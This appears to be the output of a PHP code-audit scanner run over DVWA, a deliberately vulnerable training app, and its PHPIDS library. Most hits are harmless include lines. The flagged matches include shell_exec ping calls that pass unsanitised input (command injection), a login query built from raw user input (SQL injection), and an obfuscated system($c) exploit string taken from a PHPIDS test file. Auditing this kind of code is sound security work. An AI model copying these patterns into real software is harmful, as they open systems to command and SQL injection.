3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./vulnerabilities/xss_s/index.php:4 (24/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_s/index.php:30 (25/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_s/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_s';
33-$page[ 'source_button' ] = 'xss_s';
./vulnerabilities/xss_r/index.php:4 (26/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_r/index.php:30 (27/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_r/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_r';
33-$page[ 'source_button' ] = 'xss_r';
./external/phpids/0.6/docs/examples/example.php:30 (28/58) OK | Dubious | Bad | Hide
27-    session_start();
28-}
29-
30:require_once 'IDS/Init.php';
31-
32-try {
33-
./external/phpids/0.6/docs/examples/example.php:87 (29/58) OK | Dubious | Bad | Hide
84-        /*
85-        * The following steps are optional to log the results
86-        */
87:        require_once 'IDS/Log/File.php';
88:        require_once 'IDS/Log/Composite.php';
89-
90-        $compositeLog = new IDS_Log_Composite();
91-        $compositeLog->addLogger(IDS_Log_File::getInstance($init));
./external/phpids/0.6/docs/examples/example.php:101 (30/58) OK | Dubious | Bad | Hide
98-        */
99-        /*
100-        *
101:        require_once 'IDS/Log/Email.php';
102:        require_once 'IDS/Log/Database.php';
103-
104-        $compositeLog->addLogger(
105-            IDS_Log_Email::getInstance($init),
./external/phpids/0.6/tests/IDS/ReportTest.php:22 (31/58) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:ReportTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Report.php';
25:require_once 'IDS/Event.php';
26-
27-class IDS_ReportTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/MonitorTest.php:21 (32/58) OK | Dubious | Bad | Hide
18- * @package	PHPIDS tests
19- * @version	SVN: $Id:MonitorTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21:require_once 'PHPUnit/Framework/TestCase.php';
22-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
23:require_once 'IDS/Monitor.php';
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Filter/Storage.php';
26-
27-class IDS_MonitorTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/IDS/EventTest.php:22 (33/58) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:EventTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Event.php';
25:require_once 'IDS/Filter.php';
26-
27-class IDS_EventTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/ExceptionTest.php:22 (34/58) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:ExceptionTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26:require_once 'IDS/Report.php';
27:require_once 'IDS/Event.php';
28:require_once 'IDS/Filter.php';
29:require_once 'IDS/Monitor.php';
30:require_once 'IDS/Filter/Storage.php';
31-
32-class IDS_ExceptionTest extends PHPUnit_Framework_TestCase
33-{
./external/phpids/0.6/tests/IDS/FilterTest.php:22 (35/58) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:FilterTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_FilterTest extends PHPUnit_Framework_TestCase
27-	{
./external/phpids/0.6/tests/IDS/InitTest.php:22 (36/58) OK | Dubious | Bad | Hide
19- * @version    SVN: $Id:InitTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_InitTest extends PHPUnit_Framework_TestCase {
27-
./external/phpids/0.6/tests/IDS/CachingTest.php:22 (37/58) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:CachingTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26-
27-class IDS_CachingTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/allTests.php:22 (38/58) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:allTests.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-error_reporting(E_ALL | E_STRICT | @E_DEPRECATED);
22:require_once 'PHPUnit/Framework/TestSuite.php';
23:require_once 'PHPUnit/TextUI/TestRunner.php';
24:require_once 'PHPUnit/Util/Filter.php';
25-
26-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__));
27-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__) . '/../lib/IDS/vendors');
./external/phpids/0.6/tests/allTests.php:45 (39/58) OK | Dubious | Bad | Hide
42-	public static function suite()
43-	{
44-        $suite = new PHPUnit_Framework_TestSuite('PHPIDS');
45:        require_once 'IDS/MonitorTest.php';
46-        $suite->addTestSuite('IDS_MonitorTest');
47:        require_once 'IDS/ReportTest.php';
48-        $suite->addTestSuite('IDS_ReportTest');
49:        require_once 'IDS/InitTest.php';
50-        $suite->addTestSuite('IDS_InitTest');
51:        require_once 'IDS/ExceptionTest.php';
52-        $suite->addTestSuite('IDS_ExceptionTest');
53:        require_once 'IDS/FilterTest.php';
54-        $suite->addTestSuite('IDS_FilterTest');
55:        require_once 'IDS/CachingTest.php';
56-        $suite->addTestSuite('IDS_CachingTest');
57:        require_once 'IDS/EventTest.php';
58-        $suite->addTestSuite('IDS_EventTest');
59-        return $suite;
60-	}
./external/phpids/0.6/lib/IDS/Caching/Session.php:34 (40/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Memcached.php:34 (41/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/File.php:34 (42/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Database.php:34 (43/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * Needed SQL:
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:14 (44/58) OK | Dubious | Bad | Hide
11- * 
12- * @warning
13- *      You must *not* include any other HTML Purifier files before this file,
14: *      because 'require' not 'require_once' is used.
15- * 
16- * @warning
17- *      This file requires that the include path contains the HTML Purifier
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:7 (45/58) OK | Dubious | Bad | Hide
4- * @file
5- * This file was auto-generated by generate-includes.php and includes all of
6- * the core files required by HTML Purifier. This is a convenience stub that
7: * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT
8- * EDIT THIS FILE, changes will be overwritten the next time the script is run.
9- * 
10- * Changes to include_path are not necessary.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:15 (46/58) OK | Dubious | Bad | Hide
12-
13-$__dir = dirname(__FILE__);
14-
15:require_once $__dir . '/HTMLPurifier.php';
16:require_once $__dir . '/HTMLPurifier/AttrCollections.php';
17:require_once $__dir . '/HTMLPurifier/AttrDef.php';
18:require_once $__dir . '/HTMLPurifier/AttrTransform.php';
19:require_once $__dir . '/HTMLPurifier/AttrTypes.php';
20:require_once $__dir . '/HTMLPurifier/AttrValidator.php';
21:require_once $__dir . '/HTMLPurifier/Bootstrap.php';
22:require_once $__dir . '/HTMLPurifier/Definition.php';
23:require_once $__dir . '/HTMLPurifier/CSSDefinition.php';
24:require_once $__dir . '/HTMLPurifier/ChildDef.php';
25:require_once $__dir . '/HTMLPurifier/Config.php';
26:require_once $__dir . '/HTMLPurifier/ConfigSchema.php';
27:require_once $__dir . '/HTMLPurifier/ContentSets.php';
28:require_once $__dir . '/HTMLPurifier/Context.php';
29:require_once $__dir . '/HTMLPurifier/DefinitionCache.php';
30:require_once $__dir . '/HTMLPurifier/DefinitionCacheFactory.php';
31:require_once $__dir . '/HTMLPurifier/Doctype.php';
32:require_once $__dir . '/HTMLPurifier/DoctypeRegistry.php';
33:require_once $__dir . '/HTMLPurifier/ElementDef.php';
34:require_once $__dir . '/HTMLPurifier/Encoder.php';
35:require_once $__dir . '/HTMLPurifier/EntityLookup.php';
36:require_once $__dir . '/HTMLPurifier/EntityParser.php';
37:require_once $__dir . '/HTMLPurifier/ErrorCollector.php';
38:require_once $__dir . '/HTMLPurifier/ErrorStruct.php';
39:require_once $__dir . '/HTMLPurifier/Exception.php';
40:require_once $__dir . '/HTMLPurifier/Filter.php';
41:require_once $__dir . '/HTMLPurifier/Generator.php';
42:require_once $__dir . '/HTMLPurifier/HTMLDefinition.php';
43:require_once $__dir . '/HTMLPurifier/HTMLModule.php';
44:require_once $__dir . '/HTMLPurifier/HTMLModuleManager.php';
45:require_once $__dir . '/HTMLPurifier/IDAccumulator.php';
46:require_once $__dir . '/HTMLPurifier/Injector.php';
47:require_once $__dir . '/HTMLPurifier/Language.php';
48:require_once $__dir . '/HTMLPurifier/LanguageFactory.php';
49:require_once $__dir . '/HTMLPurifier/Length.php';
50:require_once $__dir . '/HTMLPurifier/Lexer.php';
51:require_once $__dir . '/HTMLPurifier/PercentEncoder.php';
52:require_once $__dir . '/HTMLPurifier/Strategy.php';
53:require_once $__dir . '/HTMLPurifier/StringHash.php';
54:require_once $__dir . '/HTMLPurifier/StringHashParser.php';
55:require_once $__dir . '/HTMLPurifier/TagTransform.php';
56:require_once $__dir . '/HTMLPurifier/Token.php';
57:require_once $__dir . '/HTMLPurifier/TokenFactory.php';
58:require_once $__dir . '/HTMLPurifier/URI.php';
59:require_once $__dir . '/HTMLPurifier/URIDefinition.php';
60:require_once $__dir . '/HTMLPurifier/URIFilter.php';
61:require_once $__dir . '/HTMLPurifier/URIParser.php';
62:require_once $__dir . '/HTMLPurifier/URIScheme.php';
63:require_once $__dir . '/HTMLPurifier/URISchemeRegistry.php';
64:require_once $__dir . '/HTMLPurifier/UnitConverter.php';
65:require_once $__dir . '/HTMLPurifier/VarParser.php';
66:require_once $__dir . '/HTMLPurifier/VarParserException.php';
67:require_once $__dir . '/HTMLPurifier/AttrDef/CSS.php';
68:require_once $__dir . '/HTMLPurifier/AttrDef/Enum.php';
69:require_once $__dir . '/HTMLPurifier/AttrDef/Integer.php';
70:require_once $__dir . '/HTMLPurifier/AttrDef/Lang.php';
71:require_once $__dir . '/HTMLPurifier/AttrDef/Switch.php';
72:require_once $__dir . '/HTMLPurifier/AttrDef/Text.php';
73:require_once $__dir . '/HTMLPurifier/AttrDef/URI.php';
74:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Number.php';
75:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/AlphaValue.php';
76:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Background.php';
77:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php';
78:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Border.php';
79:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Color.php';
80:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Composite.php';
81:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php';
82:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Filter.php';
83:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Font.php';
84:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/FontFamily.php';
85:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php';
86:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Length.php';
87:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ListStyle.php';
88:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Multiple.php';
89:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Percentage.php';
90:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/TextDecoration.php';
91:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/URI.php';
92:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Bool.php';
93:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Color.php';
94:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/FrameTarget.php';
95:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/ID.php';
96:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Pixels.php';
97:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Length.php';
98:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/LinkTypes.php';
99:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/MultiLength.php';
100:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Nmtokens.php';
101:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email.php';
102:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Host.php';
103:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv4.php';
104:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv6.php';
105:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php';
106:require_once $__dir . '/HTMLPurifier/AttrTransform/Background.php';
107:require_once $__dir . '/HTMLPurifier/AttrTransform/BdoDir.php';
108:require_once $__dir . '/HTMLPurifier/AttrTransform/BgColor.php';
109:require_once $__dir . '/HTMLPurifier/AttrTransform/BoolToCSS.php';
110:require_once $__dir . '/HTMLPurifier/AttrTransform/Border.php';
111:require_once $__dir . '/HTMLPurifier/AttrTransform/EnumToCSS.php';
112:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgRequired.php';
113:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgSpace.php';
114:require_once $__dir . '/HTMLPurifier/AttrTransform/Input.php';
115:require_once $__dir . '/HTMLPurifier/AttrTransform/Lang.php';
116:require_once $__dir . '/HTMLPurifier/AttrTransform/Length.php';
117:require_once $__dir . '/HTMLPurifier/AttrTransform/Name.php';
118:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeEmbed.php';
119:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeObject.php';
120:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeParam.php';
121:require_once $__dir . '/HTMLPurifier/AttrTransform/ScriptRequired.php';
122:require_once $__dir . '/HTMLPurifier/AttrTransform/Textarea.php';
123:require_once $__dir . '/HTMLPurifier/ChildDef/Chameleon.php';
124:require_once $__dir . '/HTMLPurifier/ChildDef/Custom.php';
125:require_once $__dir . '/HTMLPurifier/ChildDef/Empty.php';
126:require_once $__dir . '/HTMLPurifier/ChildDef/Required.php';
127:require_once $__dir . '/HTMLPurifier/ChildDef/Optional.php';
128:require_once $__dir . '/HTMLPurifier/ChildDef/StrictBlockquote.php';
129:require_once $__dir . '/HTMLPurifier/ChildDef/Table.php';
130:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator.php';
131:require_once $__dir . '/HTMLPurifier/DefinitionCache/Null.php';
132:require_once $__dir . '/HTMLPurifier/DefinitionCache/Serializer.php';
133:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php';
134:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Memory.php';
135:require_once $__dir . '/HTMLPurifier/HTMLModule/Bdo.php';
136:require_once $__dir . '/HTMLPurifier/HTMLModule/CommonAttributes.php';
137:require_once $__dir . '/HTMLPurifier/HTMLModule/Edit.php';
138:require_once $__dir . '/HTMLPurifier/HTMLModule/Forms.php';
139:require_once $__dir . '/HTMLPurifier/HTMLModule/Hypertext.php';
140:require_once $__dir . '/HTMLPurifier/HTMLModule/Image.php';
141:require_once $__dir . '/HTMLPurifier/HTMLModule/Legacy.php';
142:require_once $__dir . '/HTMLPurifier/HTMLModule/List.php';
143:require_once $__dir . '/HTMLPurifier/HTMLModule/Name.php';
144:require_once $__dir . '/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php';
145:require_once $__dir . '/HTMLPurifier/HTMLModule/Object.php';
146:require_once $__dir . '/HTMLPurifier/HTMLModule/Presentation.php';
147:require_once $__dir . '/HTMLPurifier/HTMLModule/Proprietary.php';
148:require_once $__dir . '/HTMLPurifier/HTMLModule/Ruby.php';
149:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeEmbed.php';
150:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeObject.php';
151:require_once $__dir . '/HTMLPurifier/HTMLModule/Scripting.php';
152:require_once $__dir . '/HTMLPurifier/HTMLModule/StyleAttribute.php';
153:require_once $__dir . '/HTMLPurifier/HTMLModule/Tables.php';
154:require_once $__dir . '/HTMLPurifier/HTMLModule/Target.php';
155:require_once $__dir . '/HTMLPurifier/HTMLModule/Text.php';
156:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy.php';
157:require_once $__dir . '/HTMLPurifier/HTMLModule/XMLCommonAttributes.php';
158:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Name.php';
159:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Proprietary.php';
160:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php';
161:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Strict.php';
162:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Transitional.php';
163:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTML.php';
164:require_once $__dir . '/HTMLPurifier/Injector/AutoParagraph.php';
165:require_once $__dir . '/HTMLPurifier/Injector/DisplayLinkURI.php';
166:require_once $__dir . '/HTMLPurifier/Injector/Linkify.php';
167:require_once $__dir . '/HTMLPurifier/Injector/PurifierLinkify.php';
168:require_once $__dir . '/HTMLPurifier/Injector/RemoveEmpty.php';
169:require_once $__dir . '/HTMLPurifier/Injector/SafeObject.php';
170:require_once $__dir . '/HTMLPurifier/Lexer/DOMLex.php';
171:require_once $__dir . '/HTMLPurifier/Lexer/DirectLex.php';
172:require_once $__dir . '/HTMLPurifier/Strategy/Composite.php';
173:require_once $__dir . '/HTMLPurifier/Strategy/Core.php';
174:require_once $__dir . '/HTMLPurifier/Strategy/FixNesting.php';
175:require_once $__dir . '/HTMLPurifier/Strategy/MakeWellFormed.php';
176:require_once $__dir . '/HTMLPurifier/Strategy/RemoveForeignElements.php';
177:require_once $__dir . '/HTMLPurifier/Strategy/ValidateAttributes.php';
178:require_once $__dir . '/HTMLPurifier/TagTransform/Font.php';
179:require_once $__dir . '/HTMLPurifier/TagTransform/Simple.php';
180:require_once $__dir . '/HTMLPurifier/Token/Comment.php';
181:require_once $__dir . '/HTMLPurifier/Token/Tag.php';
182:require_once $__dir . '/HTMLPurifier/Token/Empty.php';
183:require_once $__dir . '/HTMLPurifier/Token/End.php';
184:require_once $__dir . '/HTMLPurifier/Token/Start.php';
185:require_once $__dir . '/HTMLPurifier/Token/Text.php';
186:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternal.php';
187:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternalResources.php';
188:require_once $__dir . '/HTMLPurifier/URIFilter/HostBlacklist.php';
189:require_once $__dir . '/HTMLPurifier/URIFilter/MakeAbsolute.php';
190:require_once $__dir . '/HTMLPurifier/URIFilter/Munge.php';
191:require_once $__dir . '/HTMLPurifier/URIScheme/ftp.php';
192:require_once $__dir . '/HTMLPurifier/URIScheme/http.php';
193:require_once $__dir . '/HTMLPurifier/URIScheme/https.php';
194:require_once $__dir . '/HTMLPurifier/URIScheme/mailto.php';
195:require_once $__dir . '/HTMLPurifier/URIScheme/news.php';
196:require_once $__dir . '/HTMLPurifier/URIScheme/nntp.php';
197:require_once $__dir . '/HTMLPurifier/VarParser/Flexible.php';
198:require_once $__dir . '/HTMLPurifier/VarParser/Native.php';
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.kses.php:8 (47/58) OK | Dubious | Bad | Hide
5- * Emulation layer for code that used kses(), substituting in HTML Purifier.
6- */
7-
8:require_once dirname(__FILE__) . '/HTMLPurifier.auto.php';
9-
10-function kses($string, $allowed_html, $allowed_protocols = null) {
11-    $config = HTMLPurifier_Config::createDefault();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.auto.php:8 (48/58) OK | Dubious | Bad | Hide
5- */
6-
7-set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
8:require_once 'HTMLPurifier/Bootstrap.php';
9:require_once 'HTMLPurifier.autoload.php';
./external/phpids/0.6/lib/IDS/Log/Composite.php:34 (49/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Log Composite
./external/phpids/0.6/lib/IDS/Log/File.php:34 (50/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * File logging wrapper
./external/phpids/0.6/lib/IDS/Log/Email.php:34 (51/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Email logging wrapper
./external/phpids/0.6/lib/IDS/Log/Database.php:34 (52/58) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/*
37- * Needed SQL:
./setup.php:4 (53/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-
./phpinfo.php:3 (54/58) OK | Dubious | Bad | Hide
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./dvwa/includes/dvwaPage.inc.php:15 (55/58) OK | Dubious | Bad | Hide
12-
13-
14-// Include configs
15:require_once DVWA_WEB_PAGE_TO_ROOT.'config/config.inc.php';
16-
17:require_once( 'dvwaPhpIds.inc.php' );
18-
19-// Declare the $html variable
20-if(!isset($html)){
./dvwa/includes/dvwaPhpIds.inc.php:14 (56/58) OK | Dubious | Bad | Hide
11-// Add PHPIDS to include path
12-set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' );
13-
14:require_once 'IDS/Init.php';
15-
16-function dvwaPhpIdsVersionGet() {
17-	return '0.6';
./dvwa/includes/dvwaPhpIds.inc.php:74 (57/58) OK | Dubious | Bad | Hide
71-		$result = $ids->run();
72-
73-		if (!$result->isEmpty()) {
74:			require_once 'IDS/Log/File.php';
75:			require_once 'IDS/Log/Composite.php';
76-
77-			$compositeLog = new IDS_Log_Composite();
78-			$compositeLog->addLogger(IDS_Log_File::getInstance($init));
./logout.php:4 (58/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-

shell_exec( (3) Top | Hide

./vulnerabilities/exec/source/low.php:10 (1/3) OK | Dubious | Bad | Hide
8-	if (stristr(php_uname('s'), 'Windows NT')) { 
9-	
10:		$cmd = shell_exec( 'ping  ' . $target );
11-		$html .= '<pre>'.$cmd.'</pre>';
12-		
13-	} else { 
14-	
15:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
16-		$html .= '<pre>'.$cmd.'</pre>';
17-		
18-	}
./vulnerabilities/exec/source/high.php:23 (2/3) OK | Dubious | Bad | Hide
20-		// Determine OS and execute the ping command.
21-		if (stristr(php_uname('s'), 'Windows NT')) { 
22-	
23:			$cmd = shell_exec( 'ping  ' . $target );
24-			$html .= '<pre>'.$cmd.'</pre>';
25-		
26-		} else { 
27-	
28:			$cmd = shell_exec( 'ping  -c 3 ' . $target );
29-			$html .= '<pre>'.$cmd.'</pre>';
30-		
31-		}
./vulnerabilities/exec/source/medium.php:18 (3/3) OK | Dubious | Bad | Hide
15-	// Determine OS and execute the ping command.
16-	if (stristr(php_uname('s'), 'Windows NT')) { 
17-	
18:		$cmd = shell_exec( 'ping  ' . $target );
19-		$html .= '<pre>'.$cmd.'</pre>';
20-		
21-	} else { 
22-	
23:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
24-		$html .= '<pre>'.$cmd.'</pre>';
25-		
26-	}

system( (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:1021 (1/1) OK | Dubious | Bad | Hide
1019-                        define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ;
1020-                        if  ( !0) $c = USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC ^ _a;
1021:                        if  ( !0) system($c) ;//';
1022-        $exploits[] = '" ; //
1023-                        if (!0) $_a ="". str_rot13(\'cevags\'); //
1024-                        $_b = HTTP_USER_AGENT; //

unserialize( (6) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/File.php:169 (1/6) OK | Dubious | Bad | Hide
167-        if (file_exists($this->path) && (time()-filectime($this->path)) < 
168-            $this->config['expiration_time']) {
169:            $data = unserialize(file_get_contents($this->path));
170-              return $data;
171-        }
172-
./external/phpids/0.6/lib/IDS/Caching/Database.php:192 (2/6) OK | Dubious | Bad | Hide
189-            $result->execute(array($this->type));
190-
191-            foreach ($result as $row) {
192:                return unserialize($row['data']);
193-            }
194-
195-        } catch (PDOException $e) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:33 (3/6) OK | Dubious | Bad | Hide
30-    public function get($config) {
31-        $file = $this->generateFilePath($config);
32-        if (!file_exists($file)) return false;
33:        return unserialize(file_get_contents($file));
34-    }
35-    
36-    public function remove($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema.php:54 (4/6) OK | Dubious | Bad | Hide
51-     * Unserializes the default ConfigSchema.
52-     */
53-    public static function makeFromSerial() {
54:        return unserialize(file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema.ser'));
55-    }
56-    
57-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/EntityLookup.php:23 (5/6) OK | Dubious | Bad | Hide
20-        if (!$file) {
21-            $file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/EntityLookup/entities.ser';
22-        }
23:        $this->table = unserialize(file_get_contents($file));
24-    }
25-    
26-    /**
./external/phpids/0.6/lib/IDS/Converter.php:632 (6/6) OK | Dubious | Bad | Hide
629-        $threshold = 3.49;
630-        $unserialized = false;
631-        if(preg_match('/^\w:\d+:\{/', $value)) {
632:            $unserialized = @unserialize($value);
633-        }
634-
635-        if (strlen($value) > 25 && !$unserialized) {

` (17) Top | Hide

./login.php:23 (1/17) OK | Dubious | Bad | Hide
21-	$pass = md5( $pass );
22-
23:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
24-
25-	$result = @mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
26-
./vulnerabilities/csrf/source/low.php:14 (2/17) OK | Dubious | Bad | Hide
11-			$pass_new = mysql_real_escape_string($pass_new);
12-			$pass_new = md5($pass_new);
13-
14:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
15-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
16-						
17-			$html .= "<pre> Password Changed </pre>";
